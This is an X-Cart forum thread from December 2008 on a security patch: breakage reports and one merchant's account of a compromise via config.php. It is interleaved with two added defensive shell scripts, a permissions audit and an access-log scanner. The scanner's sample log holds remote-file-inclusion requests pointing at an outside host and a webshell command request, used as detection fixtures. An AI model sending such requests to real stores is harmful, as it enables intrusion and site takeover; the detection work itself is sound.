X-Cart: shopping cart software

X-Cart forums (https://forum.x-cart.com/index.php)
-   News and Announcements (https://forum.x-cart.com/forumdisplay.php?f=28)
-   -   Security bulletin 2008-12-18 (https://forum.x-cart.com/showthread.php?t=44301)

JWait 12-20-2008 05:14 AM

Re: Security bulletin 2008-12-18
 
Wow, it's nice to see that this patch "doesn't have any 'hidden' impacts." </sarcasm>

crankez 12-20-2008 04:19 PM

Re: Security bulletin 2008-12-18
 
I just followed the Jon method and upgraded it without a problem; everything looks like it works well.

Cranko

crankez 12-21-2008 03:10 AM

Re: Security bulletin 2008-12-18
 
Bah... after some testing I discovered some huge errors...

First one: now customers are unable to register; it always says:

---
- ERROR
Please make sure you properly filled in all the required fields!
---

But all fields are filled.

Second... when you log in, the system redirects to non-secure HTTP; this is unacceptable.

So, no chance to apply the security patch; I just put in a ticket and am waiting for advice.

So I'm still with my ass uncovered...

Damn upgrades, too complicated and always lots of problems.

elmirage001 12-21-2008 08:31 AM

Re: Security bulletin 2008-12-18
 
Quote:

Originally Posted by crankez
Bah... after some testing I discovered some huge errors...

First one: now customers are unable to register; it always says:

---
- ERROR
Please make sure you properly filled in all the required fields!
---

But all fields are filled.

Second... when you log in, the system redirects to non-secure HTTP; this is unacceptable.

So, no chance to apply the security patch; I just put in a ticket and am waiting for advice.

So I'm still with my ass uncovered...

Damn upgrades, too complicated and always lots of problems.


My new customers are registering without problems... I see that you are on 4.1.9
Did you apply the other security patches before applying this patch?

From post #1
Quote:

You can find the patch by the following path:
* For X-Cart 4.1.11 version:
X-Cart -> X-Cart 4.1.11 (current version) -> Updates and patches

* For X-Cart 4.1.0 - 4.1.10 versions:
X-Cart -> X-Cart supporting files for prev versions -> X-Cart 4.1 -> {Your X-Cart version} -> Updates and patches

If you are using X-Cart versions 4.1.0 - 4.1.10, before applying this security patch you *have to* apply all the previous security patches.
You can find all the previous security patches in the "File area" section of the Support HelpDesk.


balinor 12-21-2008 08:33 AM

Re: Security bulletin 2008-12-18
 
And the previous patches cause all sorts of issues as mentioned in other threads - this just keeps getting compounded with each additional patch. Quite a nightmare.

Vacman 12-21-2008 09:25 AM

Re: Security bulletin 2008-12-18
 
Applied the patch - all seems well, except that now I get an error at the top of the checkout screen (where customers enter their personal info):

Warning: Invalid argument supplied for foreach() in /home/vacsew/public_html/cart.php on line 509

Not sure where to start...

KathyHS 12-21-2008 11:30 AM

Re: Security bulletin 2008-12-18
 
Just a note. I'm using 4.1.8 and am patched "up to date".

Yesterday and this morning we received a malicious attack. A hacker gained access via config.php and was able to use my server to send spam to 100,000s of people. He also uploaded files into the images folder, defaced the store front, and removed the pricing file, replacing it with another file.

Needless to say, this is very disappointing, especially since the newest patch was applied on the 18th.

We have taken extraordinary measures to take care of the hole and remove the files but this should not have happened...

I have never been hacked before and find it odd that it happened within 24 hours or so after the patch.

balinor 12-21-2008 11:35 AM

Re: Security bulletin 2008-12-18
 
Did the hacker get in via X-Cart or via FTP? Were your files and folders set to the correct permissions? Were your provider/ and admin/ directories password protected? Security patches only patch the software flaws, they don't secure the server and system for you - so you need to find out where the breach happened first.
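
The checks balinor lists are easy to script. What follows is an added example, written for this page and not taken from the thread or from X-Cart: a POSIX shell audit that flags world-writable paths, a config.php that other users can read, and an admin/ or provider/ directory without an Apache basic-auth .htaccess. It builds a throwaway sample tree with constructed file modes so it runs offline; the directory names and the .htaccess directives it looks for are assumptions about an Apache deployment.

```shell
#!/bin/sh
# Added example, not code from the thread or from X-Cart: audit an X-Cart
# document root for the server-side weaknesses balinor asks about.
# Checks: world-writable paths, config.php readable by others, and whether
# admin/ and provider/ carry an .htaccess that requires authentication.
# Directory names and the Apache directives are assumptions.

audit_xcart_root() {
    root=$1
    findings=0

    # 1. World-writable files or directories: on a shared host any other
    #    customer, or any script running as the web user, can rewrite them.
    ww=$(find "$root" -perm -0002 ! -type l | sort)
    if [ -n "$ww" ]; then
        printf 'WORLD-WRITABLE:\n%s\n' "$ww"
        findings=$((findings + $(printf '%s\n' "$ww" | wc -l)))
    fi

    # 2. config.php carries the database credentials; nobody but the account
    #    PHP runs as should be able to read it.
    cfg=$root/config.php
    if [ -f "$cfg" ] && [ -n "$(find "$cfg" -perm -0004)" ]; then
        echo "CONFIG READABLE BY OTHERS: $cfg"
        findings=$((findings + 1))
    fi

    # 3. admin/ and provider/ should sit behind HTTP auth in addition to the
    #    application login: look for a .htaccess with both AuthType and
    #    Require (Apache basic-auth directives; assumed layout).
    for d in admin provider; do
        ht=$root/$d/.htaccess
        if [ -d "$root/$d" ]; then
            if ! grep -qi '^[[:space:]]*AuthType' "$ht" 2>/dev/null \
               || ! grep -qi '^[[:space:]]*Require' "$ht" 2>/dev/null; then
                echo "NO HTTP AUTH ON $d/"
                findings=$((findings + 1))
            fi
        fi
    done

    echo "FINDINGS=$findings"
    return 0
}

# Constructed sample tree: a 777 images/ directory, a 644 config.php,
# admin/ without any .htaccess, provider/ correctly protected.
make_sample_root() {
    r=$(mktemp -d "${TMPDIR:-/tmp}/xcart-audit.XXXXXX")
    mkdir -p "$r/images" "$r/admin" "$r/provider"
    echo '<?php $sql_user = "xcart"; $sql_password = "secret";' > "$r/config.php"
    printf 'AuthType Basic\nAuthName "Provider"\nAuthUserFile /etc/httpd/.htpasswd\nRequire valid-user\n' \
        > "$r/provider/.htaccess"
    chmod 644 "$r/config.php"
    chmod 777 "$r/images"
    chmod 755 "$r/admin" "$r/provider"
    chmod 644 "$r/provider/.htaccess"
    echo "$r"
}

sample=$(make_sample_root)
audit_xcart_root "$sample"
rm -rf "$sample"
```

Against a real install, call `audit_xcart_root /path/to/xcart` (path assumed). On a mod_php host where PHP runs as the shared web-server user, config.php has to stay readable by that user, so 640 with the web-server group, or keeping the credentials in a file outside the document root, is the realistic target rather than 600; treat the readable-by-others finding as a prompt to check how PHP runs on that box, not as an automatic fail.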

KathyHS 12-21-2008 11:39 AM

Re: Security bulletin 2008-12-18
 
Yes, through X-Cart. Not via FTP. Yes, permissions were all set properly on those files. Yes, the admin directory is password protected.

I have [REMOVED by request of person mentioned in thread] managing all the patches on a regular basis. The breach happened from a hacker using a script he called through the config file.

[edit] - sorry. I just wanted you to see what we are dealing with... in spite of the patch. I do go out of my way to secure my server/software... it's not something I take lightly.

According to my system admin (not [REMOVED by request of person mentioned in thread], but my managed service team for my servers who also manage the security)....

"The config file is vulnerable to remote file inclusion and XSS. This allows the attacker to basically do anything unprivileged (not as root)."
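
The sysadmin's description (remote file inclusion through the config file, files uploaded into images/) maps onto two patterns that show up in the web server's access log whichever parameter was abused. The following is an added example, not code from the thread or from X-Cart, that triages an Apache combined-format log for both. The log lines, client addresses and the parameter name "inc" are constructed for the example; the thread does not name the actual vulnerable parameter and this example does not claim to.

```shell
#!/bin/sh
# Added example, not code from the thread or from X-Cart: a first triage pass
# over an Apache combined-format access log for the two traces KathyHS
# describes, a remote file inclusion (a query parameter whose value is a URL
# the script then includes) and PHP files dropped into images/.
# The log lines, addresses and the parameter name "inc" are constructed.

# Reads log lines on stdin, prints one line per suspicious request:
#   <tag> <client ip> <request path>
scan_access_log() {
    awk '
    {
        path = $7            # "GET /path?query HTTP/1.1" -> $7 is path?query
        q = index(path, "?")
        file  = (q > 0) ? substr(path, 1, q - 1) : path
        query = (q > 0) ? substr(path, q + 1)    : ""

        # 1. RFI marker: any parameter whose value starts with a URL scheme,
        #    raw or %-encoded (http%3A%2F%2F). Same-host URLs (return-to
        #    links) match too and need an allow-list in real use.
        n = split(query, kv, "&")
        for (i = 1; i <= n; i++) {
            eq = index(kv[i], "=")
            v = tolower((eq > 0) ? substr(kv[i], eq + 1) : "")
            gsub(/%3a/, ":", v); gsub(/%2f/, "/", v)
            if (v ~ /^(https?|ftp|php):\/\//) { print "RFI", $1, path; break }
        }

        # 2. PHP executed from an upload directory: images/ should only ever
        #    serve static files, so a .php request there is a dropped webshell
        #    until proven otherwise.
        if (tolower(file) ~ /^\/images\/.*\.ph(p[0-9]?|tml)$/)
            print "WEBSHELL", $1, path
    }'
}

# Constructed sample log: two RFI attempts (one raw, one URL-encoded) and one
# request to a PHP file under images/, among ordinary shop traffic.
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [20/Dec/2008:03:14:07 -0800] "GET /config.php?inc=http://203.0.113.9/s.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [20/Dec/2008:03:14:09 -0800] "GET /images/cmd.php?c=id HTTP/1.1" 200 88 "-" "Mozilla/4.0"
198.51.100.20 - - [20/Dec/2008:03:15:01 -0800] "GET /product.php?productid=1234 HTTP/1.1" 200 14312 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Dec/2008:03:16:42 -0800] "GET /config.php?inc=http%3A%2F%2F203.0.113.9%2Fs.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.21 - - [20/Dec/2008:03:17:00 -0800] "POST /cart.php?mode=checkout HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
EOF
)

printf '%s\n' "$SAMPLE_LOG" | scan_access_log
```

Against a live server, run `scan_access_log < /var/log/httpd/access_log` (path assumed). The RFI rule also fires on legitimate URL-valued parameters such as a return-to link, so allow-list those on your own host before alerting on it, and because an attacker who already runs code as the web user can edit or truncate the log, a clean log is weak evidence next to the file-system checks.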

balinor 12-21-2008 11:41 AM

Re: Security bulletin 2008-12-18
 
Well, don't post it! :( What were the permissions set to on config.php?

